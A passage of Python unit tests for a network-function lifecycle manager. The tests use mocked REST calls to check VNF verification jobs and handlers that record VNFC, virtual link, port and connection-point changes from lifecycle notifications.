"status": JOB_MODEL_STATUS.FINISHED,
"progress": JOB_PROGRESS.ERROR,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_failed_to_call_func_test(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[1, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_failed_query_job(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[1, json.JSONEncoder().encode(job_info_task), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_job_does_not_exist(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[0, json.JSONEncoder().encode(job_info_task), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s/result" % "task_id":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_job_process_error(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.ERROR,
"progress": JOB_PROGRESS.ERROR,
"responseId": 1,
"statusDescription": "already onBoarded"
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[0, json.JSONEncoder().encode(job_info_task), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s/result" % "task_id":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.FINISHED)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_failed_to_get_func_test_result(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 1,
"statusDescription": "already onBoarded"
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[0, json.JSONEncoder().encode(job_info_task), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s/result" % "task_id":
[1, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
class TestLcmNotifyViews(TestCase):
def setUp(self):
self.client = Client()
self.data = {
"status": "START",
"operation": "Instantiate",
"jobId": "",
"vnfdmodule": "",
"affectedVnfc": [{"vnfcInstanceId": "vnfc_instance_id",
"vduId": "vdu_id",
"changeType": VNFC_CHANGE_TYPE.ADDED,
"vimId": "vim_id",
"vmId": "vm_id",
"vmName": "vm_name"
}],
"affectedVl": [{"vlInstanceId": "vl_instance_id",
"vldId": "vld_id",
"changeType": VNFC_CHANGE_TYPE.ADDED,
"networkResource": {
"resourceType": NETWORK_RESOURCE_TYPE.NETWORK,
"resourceId": "resource_id",
"resourceName": "resource_name"
}
}],
"affectedCp": [{"changeType": VNFC_CHANGE_TYPE.ADDED,
"virtualLinkInstanceId": "virtual_link_instance_id",
"cpInstanceId": "cp_instance_id",
"cpdId": "cpd_id",
"ownerType": 0,
"ownerId": "owner_id",
"portResource": {
"vimId": "vim_id",
"resourceId": "resource_id",
"resourceName": "resource_name",
"tenant": "tenant",
"ipAddress": "ip_address",
"macAddress": "mac_address",
"instId": "inst_id"
}
}],
"affectedVirtualStorage": [{}]
}
self.nf_inst_id = "test_lcm_notify"
self.m_nf_inst_id = "test_lcm_notify_m_nf_inst_id"
self.vnfm_inst_id = "test_lcm_notify_vnfm_inst_id"
self.vnfd_model = {"metadata": {"vnfdId": "1"}}
self.url = "/api/nslcm/v1/ns/%s/vnfs/%s/Notify" % (self.m_nf_inst_id, self.vnfm_inst_id)
NfInstModel.objects.all().delete()
NfInstModel.objects.create(nfinstid=self.nf_inst_id,
vnfm_inst_id=self.vnfm_inst_id,
status=VNF_STATUS.NULL,
mnfinstid=self.m_nf_inst_id,
vnfd_model=self.vnfd_model
)
def tearDown(self):
NfInstModel.objects.all().delete()
VNFCInstModel.objects.all().delete()
VmInstModel.objects.all().delete()
VLInstModel.objects.all().delete()
PortInstModel.objects.all().delete()
CPInstModel.objects.all().delete()
def test_lcm_notify_view_when_change_type_is_added(self):
NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, self.data).do_biz()
vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id", vmid="vm_id",
nfinstid=self.nf_inst_id)
self.assertIsInstance(vnfc_inst, VNFCInstModel)
vm_inst = VmInstModel.objects.get(vmid="vm_id", vimid="vim_id", resouceid="vm_id", insttype=INST_TYPE.VNF,
instid=self.nf_inst_id, vmname="vm_name", hostid='1')
self.assertIsInstance(vm_inst, VmInstModel)
vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="vld_id", vlinstancename="resource_name",
ownertype=0, ownerid=self.nf_inst_id, relatednetworkid="resource_id",
vltype=0)
self.assertIsInstance(vl_inst, VLInstModel)
port_inst = PortInstModel.objects.get(networkid='unknown', subnetworkid='unknown', vimid="vim_id",
resourceid="resource_id", name="resource_name", instid="inst_id",
cpinstanceid="cp_instance_id", bandwidth='unknown',
operationalstate='active', ipaddress="ip_address",
macaddress='mac_address', floatipaddress='unknown',
serviceipaddress='unknown', typevirtualnic='unknown',
sfcencapsulation='gre', direction='unknown', tenant="tenant")
self.assertIsInstance(port_inst, PortInstModel)
cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
ownerid=self.nf_inst_id, relatedtype=2, status='active')
self.assertIsInstance(cp_inst, CPInstModel)
def test_lcm_notify_view__when_change_type_is_added_when_nf_not_exists(self):
NfInstModel.objects.all().delete()
data = {
"status": "START",
"operation": "Instantiate",
"jobId": "",
"vnfdmodule": "",
}
try:
NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
self.assertEqual(1, 0)
except Exception:
self.assertEqual(1, 1)
def test_lcm_notify_view_when_change_type_is_removeed(self):
VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
CPInstModel.objects.create(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0, ownerid=self.nf_inst_id,
relatedtype=2, relatedport="related_port", status="active")
data = {
"status": "START",
"operation": "Instantiate",
"jobId": "",
"vnfdmodule": "",
"affectedVnfc": [{"vnfcInstanceId": "vnfc_instance_id",
"vduId": "vdu_id",
"changeType": VNFC_CHANGE_TYPE.REMOVED,
"vimId": "vim_id",
"vmId": "vm_id",
"vmName": "vm_name"
}],
"affectedVl": [{"vlInstanceId": "vl_instance_id",
"vldId": "vld_id",
"changeType": VNFC_CHANGE_TYPE.REMOVED,
"networkResource": {
"resourceType": NETWORK_RESOURCE_TYPE.NETWORK,
"resourceId": "resource_id",
"resourceName": "resource_name"
}
}],
"affectedCp": [{"changeType": VNFC_CHANGE_TYPE.REMOVED,
"virtualLinkInstanceId": "virtual_link_instance_id",
"cpInstanceId": "cp_instance_id",
"cpdId": "cpd_id",
"ownerType": 0,
"ownerId": "owner_id",
"portResource": {
"vimId": "vim_id",
"resourceId": "resource_id",
"resourceName": "resource_name",
"tenant": "tenant",
"ipAddress": "ip_address",
"macAddress": "mac_address",
"instId": "inst_id"
}
}],
"affectedVirtualStorage": [{}]
}
NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
vnfc_inst = VNFCInstModel.objects.filter(vnfcinstanceid="vnfc_instance_id")
self.assertEqual(len(vnfc_inst), 0)
vl_inst = VLInstModel.objects.filter(vlinstanceid="vl_instance_id")
self.assertEqual(len(vl_inst), 0)
port_inst = PortInstModel.objects.get(networkid='unknown', subnetworkid='unknown', vimid="vim_id",
resourceid="resource_id", name="resource_name", instid="inst_id",
cpinstanceid="cp_instance_id", bandwidth='unknown',
operationalstate='active', ipaddress="ip_address",
macaddress='mac_address', floatipaddress='unknown',
serviceipaddress='unknown', typevirtualnic='unknown',
sfcencapsulation='gre', direction='unknown', tenant="tenant")
self.assertIsInstance(port_inst, PortInstModel)
cp_inst = CPInstModel.objects.filter(cpinstanceid="cp_instance_id")
self.assertEqual(len(cp_inst), 0)
def test_lcm_notify_view_when_change_type_is_modified(self):
VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
CPInstModel.objects.create(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0, ownerid=self.nf_inst_id,
relatedtype=2, relatedport="related_port")
data = {
"status": "START",
"operation": "Instantiate",
"jobId": "",
"vnfdmodule": "",
"affectedVnfc": [{"vnfcInstanceId": "vnfc_instance_id",
"vduId": "vdu_id",
"changeType": VNFC_CHANGE_TYPE.MODIFIED,
"vimId": "vim_id",
"vmId": "vm_id",
"vmName": "vm_name"
}],
"affectedVl": [{"vlInstanceId": "vl_instance_id",
"vldId": "vld_id",
"changeType": VNFC_CHANGE_TYPE.MODIFIED,
"networkResource": {
"resourceType": NETWORK_RESOURCE_TYPE.NETWORK,
"resourceId": "resource_id",
"resourceName": "resource_name"
}
}],
"affectedCp": [{"changeType": VNFC_CHANGE_TYPE.MODIFIED,
"virtualLinkInstanceId": "virtual_link_instance_id",
"cpInstanceId": "cp_instance_id",
"cpdId": "cpd_id",
"ownerType": 0,
"ownerId": "owner_id",
"portResource": {
"vimId": "vim_id",
"resourceId": "resource_id",
"resourceName": "resource_name",
"tenant": "tenant",
"ipAddress": "ip_address",
"macAddress": "mac_address",
"instId": "inst_id"
}
}],
"affectedVirtualStorage": [{}]
}
NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id", vmid="vm_id",
nfinstid=self.nf_inst_id)
self.assertIsInstance(vnfc_inst, VNFCInstModel)
vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="vld_id", vlinstancename="resource_name",
ownertype=0, ownerid=self.nf_inst_id, relatednetworkid="resource_id",
vltype=0)
self.assertIsInstance(vl_inst, VLInstModel)
port_inst = PortInstModel.objects.get(networkid='unknown', subnetworkid='unknown', vimid="vim_id",
resourceid="resource_id", name="resource_name", instid="inst_id",
cpinstanceid="cp_instance_id", bandwidth='unknown',
operationalstate='active', ipaddress="ip_address",
macaddress='mac_address', floatipaddress='unknown',
serviceipaddress='unknown', typevirtualnic='unknown',
sfcencapsulation='gre', direction='unknown', tenant="tenant")
self.assertIsInstance(port_inst, PortInstModel)
cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
ownerid=self.nf_inst_id, relatedtype=2)
self.assertIsInstance(cp_inst, CPInstModel)
class TestVnfNotifyView(TestCase):
def setUp(self):
self.client = Client()
self.nf_inst_id = "test_vnf_notify"
self.m_nf_inst_id = "test_vnf_notify_m_nf_inst_id"
self.vnfm_inst_id = "test_vnf_notify_vnfm_inst_id"
self.vnfd_model = {"metadata": {"vnfdId": "1"}}
self.url = "/api/nslcm/v2/ns/%s/vnfs/%s/Notify" % (self.vnfm_inst_id, self.m_nf_inst_id)
self.data = {
"id": "1111",
"notificationType": "VnfLcmOperationOccurrenceNotification",
"subscriptionId": "1111",
"timeStamp": "1111",
"notificationStatus": "START",
"operationState": "STARTING",
"vnfInstanceId": self.nf_inst_id,
"operation": "INSTANTIATE",
"isAutomaticInvocation": "1111",
"vnfLcmOpOccId": "1111",
"affectedVnfcs": [{"id": "vnfc_instance_id",
"vduId": "vdu_id",
"changeType": VNFC_CHANGE_TYPE.ADDED,
"computeResource": {
"vimConnectionId": "vim_connection_id",
"resourceId": "resource_id"
}
}],
"affectedVirtualLinks": [{"id": "vl_instance_id",
"virtualLinkDescId": "virtual_link_desc_id",
"changeType": VNFC_CHANGE_TYPE.ADDED,
"networkResource": {
"vimLevelResourceType": "network",
"resourceId": "resource_id"
}}],
"changedExtConnectivity": [{"id": "virtual_link_instance_id",
"extLinkPorts": [{"cpInstanceId": "cp_instance_id",
"id": "cpd_id",
"resourceHandle": {
"vimConnectionId": "vim_connection_id",
"resourceId": "resource_id",
"resourceProviderId": "resourceProviderId",
"tenant": "tenant",
"ipAddress": "ipAddress",
"macAddress": "macAddress",
"instId": "instId",
"networkId": "networkId",
"subnetId": "subnetId"
}
}],
}]
}
NfInstModel.objects.all().delete()
VNFCInstModel.objects.all().delete()
VmInstModel.objects.all().delete()
NfInstModel.objects.create(nfinstid=self.nf_inst_id,
vnfm_inst_id=self.vnfm_inst_id,
status=VNF_STATUS.NULL,
mnfinstid=self.m_nf_inst_id,
vnfd_model=self.vnfd_model
)
def tearDown(self):
NfInstModel.objects.all().delete()
VNFCInstModel.objects.all().delete()
VmInstModel.objects.all().delete()
VLInstModel.objects.all().delete()
PortInstModel.objects.all().delete()
CPInstModel.objects.all().delete()
def test_handle_vnf_lcm_ooc_notification_when_change_type_is_added(self):
# response = self.client.post(self.url, data=self.data)
HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, self.data).do_biz()
vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id",
nfinstid=self.nf_inst_id, vmid="resource_id")
self.assertIsInstance(vnfc_inst, VNFCInstModel)
vm_inst = VmInstModel.objects.get(vmid="resource_id", vimid="vim_connection_id", resouceid="resource_id",
insttype=INST_TYPE.VNF, instid=self.nf_inst_id, vmname="resource_id",
hostid='1')
self.assertIsInstance(vm_inst, VmInstModel)
vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="virtual_link_desc_id",
vlinstancename="resource_id", ownertype=0, ownerid=self.nf_inst_id,
relatednetworkid="resource_id", vltype=0)
self.assertIsInstance(vl_inst, VLInstModel)
port_inst = PortInstModel.objects.get(networkid='networkId', subnetworkid='subnetId', vimid="vim_connection_id",
resourceid="resource_id", name="resourceProviderId", instid="instId",
cpinstanceid="cp_instance_id", bandwidth='unknown',
operationalstate='active', ipaddress="ipAddress", macaddress='macAddress',
floatipaddress='unknown', serviceipaddress='unknown',
typevirtualnic='unknown', sfcencapsulation='gre', direction='unknown',
tenant="tenant")
self.assertIsInstance(port_inst, PortInstModel)
cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
ownerid=self.nf_inst_id, relatedtype=2, status='active')
self.assertIsInstance(cp_inst, CPInstModel)
def test_handle_vnf_lcm_ooc_notification_when_change_type_is_added_when_nf_not_exists(self):
data = {
"id": "1111",
"notificationType": "VnfLcmOperationOccurrenceNotification",
"subscriptionId": "1111",
"timeStamp": "1111",
"notificationStatus": "START",
"operationState": "STARTING",
"vnfInstanceId": "nf_not_exists",
"operation": "INSTANTIATE",
"isAutomaticInvocation": "1111",
"vnfLcmOpOccId": "1111"
}
try:
HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
self.assertEqual(1, 0)
except Exception:
self.assertEqual(1, 1)
def test_handle_vnf_lcm_ooc_notification_when_change_type_is_removed(self):
VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
data = {
"id": "1111",
"notificationType": "VnfLcmOperationOccurrenceNotification",
"subscriptionId": "1111",
"timeStamp": "1111",
"notificationStatus": "START",
"operationState": "STARTING",
"vnfInstanceId": self.nf_inst_id,
"operation": "INSTANTIATE",
"isAutomaticInvocation": "1111",
"vnfLcmOpOccId": "1111",
"affectedVnfcs": [{"id": "vnfc_instance_id",
"vduId": "vdu_id",
"changeType": VNFC_CHANGE_TYPE.REMOVED,
"computeResource": {
"vimConnectionId": "vim_connection_id",
"resourceId": "resource_id"
}}],
"affectedVirtualLinks": [{"id": "vl_instance_id",
"virtualLinkDescId": "virtual_link_desc_id",
"changeType": VNFC_CHANGE_TYPE.REMOVED,
"networkResource": {
"vimLevelResourceType": "network",
"resourceId": "resource_id"
}}]
}
HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
vnfc_inst = VNFCInstModel.objects.filter(vnfcinstanceid="vnfc_instance_id")
self.assertEqual(len(vnfc_inst), 0)
vl_inst = VLInstModel.objects.filter(vlinstanceid="vl_instance_id")
self.assertEqual(len(vl_inst), 0)
def test_handle_vnf_lcm_ooc_notification_when_change_type_is_modified(self):
VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
data = {
"id": "1111",
"notificationType": "VnfLcmOperationOccurrenceNotification",
"subscriptionId": "1111",
"timeStamp": "1111",
"notificationStatus": "START",
"operationState": "STARTING",
"vnfInstanceId": self.nf_inst_id,
"operation": "INSTANTIATE",
"isAutomaticInvocation": "1111",
"vnfLcmOpOccId": "1111",
"affectedVnfcs": [{"id": "vnfc_instance_id",
"vduId": "vdu_id",
"changeType": VNFC_CHANGE_TYPE.MODIFIED,
"computeResource": {
"vimConnectionId": "vim_connection_id",
"resourceId": "resource_id"
}}],
"affectedVirtualLinks": [{"id": "vl_instance_id",
"virtualLinkDescId": "virtual_link_desc_id",
"changeType": VNFC_CHANGE_TYPE.MODIFIED,
"networkResource": {
"vimLevelResourceType": "network",
"resourceId": "resource_id"
}}],
"changedExtConnectivity": [{"id": "virtual_link_instance_id",
"extLinkPorts": [{"cpInstanceId": "cp_instance_id",
"id": "cpd_id",
"resourceHandle": {
"vimConnectionId": "vim_connection_id",
"resourceId": "resource_id",
"resourceProviderId": "resourceProviderId",
"tenant": "tenant",
"ipAddress": "ipAddress",
"macAddress": "macAddress",
"instId": "instId",
"networkId": "networkId",
"subnetId": "subnetId"
}
}],
}]
}
HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id",
nfinstid=self.nf_inst_id, vmid="resource_id")
self.assertIsInstance(vnfc_inst, VNFCInstModel)
vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="virtual_link_desc_id",
vlinstancename="resource_id", ownertype=0, ownerid=self.nf_inst_id,
relatednetworkid="resource_id", vltype=0)
self.assertIsInstance(vl_inst, VLInstModel)
port_inst = PortInstModel.objects.get(networkid='networkId', subnetworkid='subnetId', vimid="vim_connection_id",
resourceid="resource_id", name="resourceProviderId", instid="instId",
cpinstanceid="cp_instance_id", bandwidth='unknown',
operationalstate='active', ipaddress="ipAddress", macaddress='macAddress',
floatipaddress='unknown', serviceipaddress='unknown',
typevirtualnic='unknown', sfcencapsulation='gre', direction='unknown',
tenant="tenant")
self.assertIsInstance(port_inst, PortInstModel)
cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
ownerid=self.nf_inst_id, relatedtype=2, status='active')
self.assertIsInstance(cp_inst, CPInstModel)
def test_handle_vnf_identifier_creation_notification(self):
vnfm_id = "vnfm_id"
vnf_instance_id = "vnf_instance_id"
data = {
"timeStamp": "20190809",
}
HandleVnfIdentifierCreationNotification(vnfm_id, vnf_instance_id, data).do_biz()
nf_inst = NfInstModel.objects.get(mnfinstid=vnf_instance_id, vnfm_inst_id=vnfm_id, create_time="20190809")
self.assertIsInstance(nf_inst, NfInstModel)
def test_handle_vnf_identifier_deletion_notification(self):
nf_inst_id = "nf_inst_id"
vnfm_id = "vnfm_id"
vnf_instance_id = "vnf_instance_id"
NfInstModel.objects.create(nfinstid=nf_inst_id,
vnfm_inst_id=vnfm_id,
status=VNF_STATUS.NULL,
mnfinstid=vnf_instance_id,
vnfd_model=self.vnfd_model
)
data = {
"timeStamp": "20190809",
}
HandleVnfIdentifierDeletionNotification(vnfm_id, vnf_instance_id, data).do_biz()
nf_inst = NfInstModel.objects.filter(mnfinstid=vnf_instance_id, vnfm_inst_id=vnfm_id)
self.assertEqual(len(nf_inst), 0)
def test_handle_vnf_identifier_deletion_notification_when_nf_not_exists(self):
NfInstModel.objects.all().delete()
vnfm_id = "nf_not_exists"
vnf_instance_id = "nf_not_exists"
data = {
"timeStamp": "20190809",
}
try:
HandleVnfIdentifierDeletionNotification(vnfm_id, vnf_instance_id, data).do_biz()
self.assertEqual(1, 0)
except Exception:
self.assertEqual(1, 1)
@mock.patch.object(restcall, "call_req")
def test_handle_vnf_identifier_notification_when_save_ip_aai(self, mock_call_req):
l_interface_info_aai = {
"interface-name": "resourceProviderId",
"is-port-mirrored": False,
"resource-version": "1589506153510",
"in-maint": False,
"is-ip-unnumbered": False
}
l3_interface_ipv4_address_list = {
"l3-interface-ipv4-address": "ipAddress",
"resource-version": "1589527363970"
}
mock_vals = {
"/network/generic-vnfs/generic-vnf/%s/l-interfaces/l-interface/%s"
% ("test_vnf_notify", "resourceProviderId"):
[0, json.JSONEncoder().encode(l_interface_info_aai), "200"],
"/network/generic-vnfs/generic-vnf/%s/l-interfaces/l-interface/%s/l3-interface-ipv4-address-list/%s"
% ("test_vnf_notify", "resourceProviderId", "ipAddress"):
[0, json.JSONEncoder().encode(l3_interface_ipv4_address_list), "200"],
"/network/l3-networks/l3-network/%s" % "vl_instance_id":
[0, json.JSONEncoder().encode({}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
data = {
"id": "1111",
"notificationType": "VnfLcmOperationOccurrenceNotification",
"subscriptionId": "1111",
"timeStamp": "1111",
"notificationStatus": "START",
"operationState": "STARTING",
"vnfInstanceId": self.nf_inst_id,
"operation": "INSTANTIATE",
"isAutomaticInvocation": "1111",
"vnfLcmOpOccId": "1111",
"affectedVnfcs": [{"id": "vnfc_instance_id",
"vduId": "vdu_id",
"changeType": VNFC_CHANGE_TYPE.MODIFIED,
"computeResource": {
"vimConnectionId": "vim_connection_id",
"resourceId": "resource_id"
}}],
"affectedVirtualLinks": [{"id": "vl_instance_id",
"virtualLinkDescId": "virtual_link_desc_id",
"changeType": VNFC_CHANGE_TYPE.MODIFIED,
"networkResource": {
"vimLevelResourceType": "network",
"resourceId": "resource_id"
}}],
"changedExtConnectivity": [{"id": "virtual_link_instance_id",
"extLinkPorts": [{"cpInstanceId": "cp_instance_id",
"id": "cpd_id",
"resourceHandle": {
"vimConnectionId": "vim_connection_id",
"resourceId": "resource_id",
"resourceProviderId": "resourceProviderId",
"tenant": "tenant",
"ipAddress": "ipAddress",
"macAddress": "macAddress",
"instId": "instId",
"networkId": "networkId",
"subnetId": "subnetId"
}
}],
"changeType": VNFC_CHANGE_TYPE.MODIFIED
}]
}
